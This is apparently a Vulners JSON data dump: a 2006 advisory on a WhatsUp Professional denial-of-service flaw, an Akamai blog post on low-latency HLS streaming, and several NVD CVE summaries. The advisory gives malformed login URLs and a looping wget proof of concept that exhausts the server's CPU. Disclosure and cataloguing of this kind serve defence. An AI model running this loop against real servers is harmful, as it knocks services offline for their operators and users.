{"id": "SECURITYVULNS:DOC:11563", "bulletinFamily": "software", "title": "IpSwitch WhatsUp Professional 2006 DoS", "description": "Synopsis: IPSwitch WhatsUp Professional 2006 DoS Flaw\r\n\r\nProduct: IPSwitch WhatsUp\r\n http://www.ipswitch.com\r\n\r\nVersion: Confirmed on WhatsUp Professional 2006\r\n\r\nAuthor: Josh Zlatin-Amishav\r\n\r\nDate: February 22, 2006\r\n\r\nBackground:\r\nWhatsUp Professional 2006 is application and network management that keeps your\r\ncritical business technology, like email servers and databases, working \r\nefficiently so you can run your business.\r\n\r\nIssue:\r\nThe NmService.exe executable does not handle certain requests properly. The \r\nfollowing URLs can be used to create a DoS condition due to the NmService using\r\n100% CPU\r\n\r\nhttp://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&btnLogIn=[Log&In]=&sLoginUserName=\r\n\r\nhttp://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&btnLogIn=[Log&In]=&sLoginPassword=\r\n\r\nhttp://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&In]=&btnLogIn=\r\n\r\nhttp://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&btnLogIn=[Log&In]=\r\n\r\n\r\nPoC:\r\n\r\nwhile [ 1 ];\r\ndo\r\n wget -O /dev/null\r\nhttp://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&b;tnLogIn=[Log&In]=&sLoginUserName=;\r\ndone\r\n\r\nReferences:\r\nhttp://www.ipswitch.com\r\nhttp://zur.homelinux.com/Advisories/ipswitch_dos.txt", "published": "2006-02-24T00:00:00", "modified": "2006-02-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11563", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:16", "edition": 1, "viewCount": 2, "enchantments": {"score": {"value": 2.3, "vector": "NONE", "modified": "2018-08-31T11:10:16", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB3023167", "KB2880833", "KB953334", "KB2874216", "KB3209587", "KB981401", "KB2788321", "KB2510690", "KB955430"]}, {"type": "threatpost", "idList": ["THREATPOST:F3563336B135A1D7C1251AE54FDC6286"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2164.NASL", "FREEBSD_PKG_D887B3D9736611EAB81A001CC0382B2F.NASL", "FREEBSD_PKG_090763F6703011EA93DD080027846A02.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892164"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2164-1:52F3C"]}, {"type": "freebsd", "idList": ["D887B3D9-7366-11EA-B81A-001CC0382B2F"]}, {"type": "zdt", "idList": ["1337DAY-ID-34154", "1337DAY-ID-34153", "1337DAY-ID-34158", "1337DAY-ID-34157"]}], "modified": "2018-08-31T11:10:16", "rev": 2}, "vulnersScore": 2.3}, "affectedSoftware": []}

{"akamaiblog": [{"lastseen": "2020-11-23T16:20:32", "bulletinFamily": "blog", "cvelist": [], "description": "### Introduction\n\nHTTP Adaptive Segmented (HAS) streaming began to be used at scale from 2008 to 2012, with the advent of Move Networks, Microsoft Smooth Streaming, Apple HLS, Adobe HDS, and MPEG DASH. With the typical 10s segment durations of the day, livestream latencies (measuring latency as the time from an action being filmed to that same action being displayed on a device's screen) remained in the 30s to 60s range, trailing broadcast by a significant degree. Over the next decade, segment durations were reduced down to 2s, bringing with them a concomitant reduction in latency to the 8s to 16s range. That range remains the typical latency for many live events today. The year 2020 then brought the industry a pleasant surprise -- not one, but two HAS standards were released that target latency in the 2s range: Low Latency DASH (LL-DASH) and Low Latency HLS (LL-HLS). Both these standards were developed independently, and while they can be deployed as separate streams in a content delivery system, there are performance and cost gains to be had for packagers, origins, CDNs, and players if both streaming formats can be served by a single-set of media objects.\n\nThe HLS [specification](<https://tools.ietf.org/html/draft-pantos-hls-rfc8216bis-07>) was updated to describe version 10 of the streaming protocol. Among the many improvements, LL-HLS introduces the notion of partial segments (\"parts\"). Each part can be addressed discreetly via a unique URL, or optionally as a referenced byte-range into a media segment. The vast majority of early implementations have focused on the discreet part-addressing mode. However, range-based addressing brings with it several performance advantages, along with a path to interoperability with LL-DASH solutions and increased CDN efficiency. It also harbors some curious requirements for implementation across general purpose proxy caches. \n\nThis article will investigate the problems we can solve with range-based addressing, the requirements it brings to operate effectively, and the benefits we can gain by deploying it at scale. \n\n### Cache efficiency\n\nLet's start by examining cache efficiency at the edge when faced with a mixture of low latency and standard latency HLS and DASH clients, all playing the same content. Caching is the means by which CDNs scale up HTTP-adaptive streams. The more content can be cached, the better the performance and the lower the costs. If we imagine an LL-HLS stream with 4s segments and 1s parts, Figure 1 shows all the objects that will need to be cached at the edge within a 4s window. There are many of them! Some are larger than others and we can highlight this difference by scaling them graphically such that the area is proportional to the size. Figure 1 shows that the video segments take up the largest amount of space. \n\n[](<https://blogs.akamai.com/LowLatencyBlog1_23Nov.png>)_Figure 1_\n\nNotice there is duplication in content between the parts (purple), which are consumed by a low latency client playing at the live edge, and the contiguous media segments (green), which are consumed by standard latency clients, or low latency clients scrubbing behind the live edge. If we were to add in the DASH footprint, we would see in Figure 2 that we have three silos of files, all holding the same media content, yet competing with one another for cache space. \n\n\n[](<https://blogs.akamai.com/LowLatencyBlog2_23Nov.png>)_Figure 2_ \n\n\nOur goal is to reduce these down to a single silo. This will lower origin storage by a factor of 3 and also triple the cache efficiency for the CDN. This can be achieved through the use of byte-range addressing.\n\n### Byte-range addressing\n\nWithin an LL-HLS media playlist, a part is described discreetly using a unique URL for every part. For example\n\n#EXT-X-PART:DURATION=0.500,URI=\"segment1000-6.m4s\" \n\n\nThis same part can alternatively be described using the BYTERANGE syntax \n\n\n#EXT-X-PART:DURATION=0.500,URI=\"segment1000.m4s\",BYTERANGE=251022@2079557 \n\n\nwhich specifies the length and offset at which a part is located within a media segment. For PRELOAD HINT parts, for which the last-byte-position is not yet known, only the start of the byte range is signalled: \n\n\n#EXT-X-PRELOAD-HINT:TYPE=PART,URI=\"segment1000.m4s\",BYTERANGE-START=2005479 \n\n\nFigure 3 shows a discreet part playlist on the left, and it's byte-range-addressed equivalent on the right: \n\n\n[](<https://blogs.akamai.com/LowLatencyBlog3_23Nov.png>)_Figure 3_\n\nOf particular interest to us is the expected origin behavior when faced with the open range request specified by the PRELOAD HINT entry. According to the [HLS spec](<https://tools.ietf.org/html/draft-pantos-hls-rfc8216bis-07>), \"When processing requests for a URL or a byte range of a URL that includes one or more Partial Segments that are not yet completely available to be sent - such as requests made in response to an EXT-X- PRELOAD-HINT tag - the server MUST refrain from transmitting any bytes belonging to a Partial Segment until all bytes of that Partial Segment can be transmitted at the full speed of the link to the client.\" This means that the origin must hold back beginning the response until all the bytes of that preload part are available. But what then? The spec continues: \"If the requested range includes more than one Partial Segment then the server MUST enforce this delivery guarantee for each Partial Segment in turn. This enables the client to perform accurate Adaptive Bit Rate (ABR) measurements.\" Since our open range request does include more than one part (in fact, it includes all the remaining parts of that segment), the origin should continue to return successive parts down the same response, bursting each part as it becomes fully available. The key point here is that that single request will in fact return all the parts remaining in that segment. Figure 4 illustrates how we can use this fact to derive a common workflow between LL-HLS and LL-DASH.\n\n[](<https://blogs.akamai.com/LowLatencyBlog4_23Nov.png>)_Figure 4_\n\nThe lower half of Figure 4 represents the workflow for a client using byte range addressing. At time 0, it makes an open-ended range request against segment 1. The origin blocks the response until the entirety of part 1 is available and then it begins an aggregated response back to the client. I use the term \"aggregated\" carefully here. If this were http/1.1, it would be a chunked transfer response, however since LL-HLS mandates the use of http/2, and http/2 has framing, this is simply an aggregating http/2 response. Notice that bytes are injected into the byte-addressed response at the exact same time as they are released down the wire for the discreet-addressed parts. The two approaches are latency-equivalent. Also, importantly -- the aggregating response in the byte-addressed case is exactly what an LL-DASH client is expecting. DASH clients do not have the constraint that the part (or \"chunk\" in their context) must be burst, but this bursting does not hurt them and in fact it helps considerably with their bandwidth estimation. \n\n### Request-rate benefits\n\nLet's examine the start-up behavior of a byte-range-addressed LL-HLS client. Consider a client faced with the media playlist at start-up (post tune-in) in Figure 5.\n\n[](<https://blogs.akamai.com/LowLatencyBlog5_23Nov.png>)_Figure 5_\n\nIt could simply act as a discreet-addressed client would, which is to make seven independent requests for each individual part. The last request would be an open one for the PRELOAD part. Another option, however, is that it could simply make a single request, as shown in Figure 6.\n\n[](<https://blogs.akamai.com/LowLatencyBlog6_23Nov.png>)_Figure 6_\n\nThis single request would return all the parts, in the correct sequence, all at line speed and including all the future parts that will follow the PRELOAD part. This is exactly what the player needs and (for this ratio of part duration to segment duration) it can be accomplished with a seven-fold decrease in media object requests. Since one of the negatives of LL-HLS is its high request rate against an edge, this is a promising benefit. However, there's a problem in deploying this and it relates to exactly how a CDN edge will interpret that open-range request._ \n_\n\n### The problem with open-ended range requests\n\nImagine you are an edge server, and you receive a client request for range=0 against an object whose size you do not yet know. Let's imagine its actual size is 1000B and you have the first 100B received at the edge. Do you:\n\n 1. Wait until you have received an EOF signal and return a 200 response code with content-length 1000? \n_or_ \n\n 2. Immediately return the 100B you do have in an open-ended 206 response and close the response once the 1000th byte is delivered?\n\nBehavior 1 is actually how most CDNs would behave today, yet 2 is the behavior that we need for our low latency streaming to work. Since both are valid use-cases, how can an edge server tell what behavior to enact? Luckily, there is an RFC to the rescue! [RFC8673](<https://tools.ietf.org/html/rfc8673>) says that the client should never make an open-ended range request if it is expecting an aggregated response from a fixed offset. It should instead send a request with a very large number as the last-byte-pos in the range request. 9007199254740991 has been proposed as a candidate (this equals Number.MAX_SAFE_INTEGER for 64 bit systems). This would signal the proxy-server (or origin) to begin a 206 response that starts at the requested offset and aggregates over time until the object is completely transferred. Note that this convention is only required when the start-byte-pos of the range request is non-zero. If the range being requested starts at zero, then a standard (non-range) GET request can be used, as the origin will naturally provide the aggregating response. \n\nWith this RFC in mind, let's examine the start-up behavior again. There are three scenarios we should consider. The first is for a player tuning-in to the playlist shown below in Figure 7:\n\n[](<https://blogs.akamai.com/LowLatencyBlog7_23Nov.png>)_Figure 7_\n\nIn order to commence playback, it would walk back from the live edge and find the latest independent part (highlighted in yellow). It would then make the following request:\n\nGET / v1_1-7728.m4s HTTP/2\n\nNotice that the RFC8673 convention is not needed here since the starting offset is zero. The server would respond with:\n\nHTTP/2 200\n\nThe origin would respond by bursting the bytes it has (up to 375122) and then releasing the remainder as each part boundary becomes available. This would give the player the independent part it needs to start, plus all the segments up to and including the HINTed part. The response would not include a content-length header, as the size is not known. If this were an HTTP1.1 connection, it would be signalled as a Chunked Transfer Encoding response, but since LL-HLS mandates H2 connections to the client, this is simply seen by the client as an aggregating response. \n\nThe second start-up case concerns an independent part at a non-zero offset into the segment. The media playlist might look like Figure 8:\n\n[](<https://blogs.akamai.com/LowLatencyBlog8_23Nov.png>)_Figure 8_\n\nThis media segment has two independent parts and we wish to start with the latest one to minimize our latency. The client would first ask for\n\nGET / v1_1-7728.m4s HTTP/2\n\nRange: bytes=245668-9007199254740991\n\nNote that the request has a first-byte position of 245668 instead of zero, which requires the use of the RFC8673 convention. The server would respond with\n\nHTTP/2 206 Partial Content\n\nContent-Range: bytes 245668-9007199254740991/*\n\nThe origin responds by acknowledging the convention established by RFC8673 in the content-range header, along with signalling the content length as * since it is not yet known. It would then burst the bytes from 245668 to 375123 and release the remainder as each part boundary became available. \n\nThe third and last start-up case is the edge condition in which the PRELOAD hint represents the start of a new segment.\n\n[](<https://blogs.akamai.com/LowLatencyBlog9_23Nov.png>)_Figure 9_\n\nNotice in Figure 9 that the HINT belongs to segment 7729 (purple highlight) while the prior segment 7728 holds the independent part we need to start with. To start up, the player needs to make two requests. The first would be:\n\nGET / v1_1-7728.m4s HTTP/2\n\nRange: bytes=245668-498933\n\nSince segment 7728 is completely available, the player knows the content-length of the segment so it does not need to use the RFC8673 very-big-number convention. It simply asks for the byte range from the start of the last independent part to the end of the segment. The server would respond with\n\nHTTP/2 206 Partial Content\n\nContent-Length: 253265\n\nContent-Range: bytes 245668-498933/498934\n\nThis is a conventional 206 response. Since the content-length is known, the Content-Length response header is added. All the data would be burst as one contiguous block as the segment is fully available at the origin. The client would then need to make a second request to continue playback:\n\nGET / v1_1-7729.m4s HTTP/2\n\nThe server would respond with:\n\nHTTP/2 200\n\nThe server bursts all the parts of segment 7729 as they become available in an aggregating response and the player is off to steady-state playback.\n\n### Steady state\n\nSpeaking of steady state, what does that look like? If we were to examine all the requests crossing the wire after the player has started, they would look like this:\n\nGET / v1_1-7729.m4s HTTP/2\n\nRange: bytes=567843-9007199254740991\n\nGET / v1_1-7730.m4s HTTP/2\n\nGET / v1_1-7731.m4s HTTP/2\n\nGET / v1_1-7732.m4s HTTP/2\n\n...\n\nAside from the very first request, which uses the RFC8673 convention due to the non-zero starting offset, these are all standard GET requests without range headers. Surprisingly, we can make the general observation that an LL-HLS client using byte range addressing need only make one request per segment duration for each media type. This is nice performance gain for LL-HLS, which otherwise is quite a verbose format. Note that the client must still refresh its media playlists at the respective part duration interval, as those provide it with information on the changing state of the stream. The reduction in overall request rate is dependent on the ratio of part duration to segment duration. Table 1 shows the number of requests made per segment duration of wall clock interval for an LL-HLS client using either discrete or range-based part addressing.\n\n[](<https://blogs.akamai.com/LowLatencyBlog10_23Nov.png>)_Table 1_\n\nFor the case of 4s segments and 1s parts, we see a 37.5% reduction in the overall number of requests every 4s. If the parts are reduced to 0.5s in duration, then that reduction rises to 43%. That is a material gain that is important for CDN scalability and overall system cost. For a million connected clients, having 430,000 fewer requests every 4s is a material difference. Each request against a CDN has a cost -- in connections, compute, and power. For maximum distribution efficiency, we want to minimize our requests while maximizing the end user's quality of experience.\n\n### Segment structure\n\nEarly versions of the LL-HLS origins produced parts that were all independent (i.e., each one contained a keyframe) and then had contiguous segments with a single keyframe, as represented in Figure 10.\n\n[](<https://blogs.akamai.com/LowLatencyBlog11_23Nov.png>)_Figure 10_\n\nThe reason for this is encoding efficiency -- there is a small gain in encoding efficiency by moving to the longer GOP. However this arrangement breaks the portability of having a single object be stored in cache from which we can serve both parts and segments. In order to achieve a unified cache, our segment must be a direct concatenation of our parts, as represented in Figure 11.\n\n[](<https://blogs.akamai.com/LowLatencyBlog12_23Nov.png>)_Figure 11_\n\nThe benefits to be gained by halving the cache footprint far outweigh the small encoding efficiency gains to be had by having two bit-different objects.\n\n### Estimating throughput\n\nAll HTTP adaptive streaming clients must use the download of the media segments in order to estimate the available throughput and thereby allow their ABR algorithm to switch-up. \n\n[](<https://blogs.akamai.com/LowLatencyBlog13_23Nov.png>)\n\n_Figure 12_\n\nWith discreet part delivery, this is done by measuring the bits received and dividing by the time taken to receive them, as illustrated in Figure 12. Since the objects are fully available at the server, the rate at which they are delivered is limited by the line speed and hence can be used to estimate how much throughput overhead is available. If the same logic is followed for an aggregating range-addressing response, it will provide an incorrect response. The bit numerator will be correct, but the denominator will include the time the origin was blocking delivery, as in Figure 13.\n\n[](<https://blogs.akamai.com/LowLatencyBlog14_23Nov.png>)_Figure 13_\n\nThe player will keep dividing the total bits of the media segment by the delivery time, which is essentially the media playback time of the segment. This result will always return that the estimated throughput is equal to the encoded bitrate of the object -- a useless result that will be both inaccurate and prevent the player from ever switching up to a higher bitrate tier. \n\nWhat the player must do instead is only estimate throughout when the bits-across-the-wire are increasing, as shown in Figure 14.\n\n[](<https://blogs.akamai.com/LowLatencyBlog15_23Nov.png>)_Figure 14_ \n\n\nHow can the player do this? Well, conveniently, the media playlist described the part boundaries as ranges and the origin and edge server are required to always burst parts. So if the player monitors its receive buffer it can mark the wall-clock time at which the part boundaries are received and hence calculate the throughput over the correct portion of the aggregation window. \n\n### Enough theory -- Does this work in the real world?\n\nTo validate the concepts described in this blog across the real internet, I collaborated with [Ateme](<https://www.ateme.com/>), a France-based provider of encoder and origin servers. Ateme mounted an encoder and LL-HLS origin in a AWS instance in the state of Virginia in the United States. I then placed the Akamai CDN on top of this and used it to stream to a client located in San Francisco, California, as shown in Figure 15.\n\n[](<https://blogs.akamai.com/LowLatencyBlog16_23Nov.png>)_Figure 15_\n\nThe player was a test harness that I wrote in Javascript, so that it could be run in a web browser. A browser-based player is a very convenient endpoint from which to validate requests, timing, and CDN performance. Figure 16 is a screenshot of the livestream in action.\n\n[](<https://blogs.akamai.com/LowLatencyBlog17_23Nov.png>)_Figure 16_ \n\n\nThis stream contains 4s segments with 0.5s parts. It is operating at its target end-to-end latency of 1.5ss. In the chart on the right the green dots show the completion of each media segment request. These all take just under 4s, which is what we would expect. The orange dots represent the media playlist updates, which are occurring every 500ms. By examining the video object requests in Figure 17,\n\n[](<https://blogs.akamai.com/LowLatencyBlog18_23Nov.png>)_Figure 17_\n\nwe can see that the requests are only made against the segments and that each receives a 200 response from the edge server and takes just under 4s to complete. It is a curious fact that even though we are using range-based addressing with LL-HLS, under steady playback the client does not need to make any range-based requests! If an initial request had been made at a non-zero offset, it would have used the RFC8673 convention and this would show as a 206 response preceded by a CORS preflight OPTIONS request to verify that the range header is allowed. This preflight request is an artifact of testing from a web browser and would not be present if testing from a native app. The media playlist updates in comparison (in Figure 18) are returned much faster than the media segments, at roughly 500ms intervals. Notice each one asks for a successively newer version of the playlist using the reserved _HLS_msn and -HLS_part query args. \n\n[](<https://blogs.akamai.com/LowLatencyBlog19_23Nov.png>)_Figure 18_\n\n__Figure 19 shows a detail of one of the media segment requests. Note that there is no content-range response header since the client is asking for the full segment and there is no content-length response header since this is an aggregating H2 response against an object of unknown size._ \n_\n\n[](<https://blogs.akamai.com/LowLatencyBlog20_23Nov.png>)_Figure 19_\n\nFigure 20 shows our three target players all playing together from the same origin and edge server. On the lower left is the LL-HLS player in byte-range addressing mode. Upper left is the LL-DASH player. On the right is a standard latency HLS player, represented by HLS.js.\n\n[](<https://blogs.akamai.com/LowLatencyBlog21_23Nov.png>)_Figure 20_\n\nThis standard latency player is playing the exact same stream as the LL-HLS player, but is 12s behind, since it ignores the parts and instead builds three of the 4s segments in its source buffer before starting. Figure 21 is basically validation of the whole approach espoused by this document. It shows the network panels of the three players arranged adjacent to one another. You'll notice that each player is pulling the same media segment from the edge; 1-401326000.m4s,- for example.\n\n[](<https://blogs.akamai.com/LowLatencyBlog22_23Nov.png>)_Figure 21_\n\nThe panel in the center belongs to the legacy latency player and it is always a full segment behind the other two players, which are both low latency and pull the object while it is still being produced. If we examine the first player to request a given segment from the CDN edge, we notice that it receives a TCP_MISS response (Figure 22). This indicates that the content was not available at the edge and that the edge had to make a forward request to the origin to retrieve it. This is normal behavior as at least one request must always go to the origin to retrieve the content.\n\n[](<https://blogs.akamai.com/LowLatencyBlog23_23Nov.png>)_Figure 22_\n\nWhat is important is that the second and subsequent requests for the same object received a TCP_HIT response (Figure 23). This indicates that the object is in fact being cached at, and served from, the edge. Success!\n\n[](<https://blogs.akamai.com/LowLatencyBlog24_23Nov.png>)_Figure 23_\n\n### Conclusion\n\nThe advent of range-based addressing for LL-HLS opens up a number of benefits for distributors of livestreams:\n\n * Increased cache efficiency at origin and CDN distribution tiers, which increases performance and lowers operating costs\n * Decreased request rate from clients. We showed reductions of 30% to 40% for typical encoding configurations, which allows increased CDN-supported scale, lowers operating costs, and reduces the incidence between request errors.\n * An LL-HLS client under steady-state playback does not need to make any range-requests against the origin even when range-based addressing is used in the playlist.This removes the CORS preflight requirements for browser-based clients, improving the latency with which playlists and segments can be returned.\n * Interoperability among four types of clients: low latency HLS clients, standard latency HLS clients (also equivalent to LL-HLS clients scrubbing back from live), low latency DASH clients, and standard latency DASH clients\n * If a CDN is present in the distribution chain, then it requires support for RFC8673 at the origin, CDN, and client layers to work effectively. If the clients are talking directly to the origin, then the origin can be expected to behave appropriately and no RFC8673 convention would be required.\n\nWe are pleased to announce the Akamai is now supporting RFC8673 in production as of October 30, 2020, via our Adaptive Media Delivery (AMD) product. It needs to be activated through metadata so please contact your account representative if you are interested in testing.\n\nWe look forward to the advent of interoperable low latency streaming at scale. If you have any questions, please don't hesitate to get in touch with me directly.\n\n", "modified": "2020-11-23T15:59:53", "published": "2020-11-23T14:00:00", "id": "AKAMAIBLOG:0D53025012545B375375D5D53F442C25", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/Kr3PGujTIK8/using-ll-hls-with-byte-range-addressing-to-achieve-interoperability-in-low-latency-streaming.html", "type": "akamaiblog", "title": "Using LL-HLS with byte-range addressing to achieve interoperability in low latency streaming", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:52:25", "description": "An issue was discovered in Open Ticket Request System (OTRS) 6.0.x through 6.0.7. A carefully constructed email could be used to inject and execute arbitrary stylesheet or JavaScript code in a logged in customer's browser in the context of the OTRS customer panel application.", "edition": 9, "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.6, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.5}, "published": "2019-07-08T13:15:00", "title": "CVE-2018-11563", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.9, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11563"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:otrs:otrs:6.0.7"], "id": "CVE-2018-11563", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11563", "cvss": {"score": 4.9, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:otrs:otrs:6.0.7:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:38:40", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", "edition": 3, "cvss3": {}, "published": "2019-05-09T20:29:00", "title": "CVE-2019-11563", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2019-11563"], "modified": "2019-09-21T20:15:00", "cpe": [], "id": "CVE-2019-11563", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11563", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-02-02T06:21:32", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": 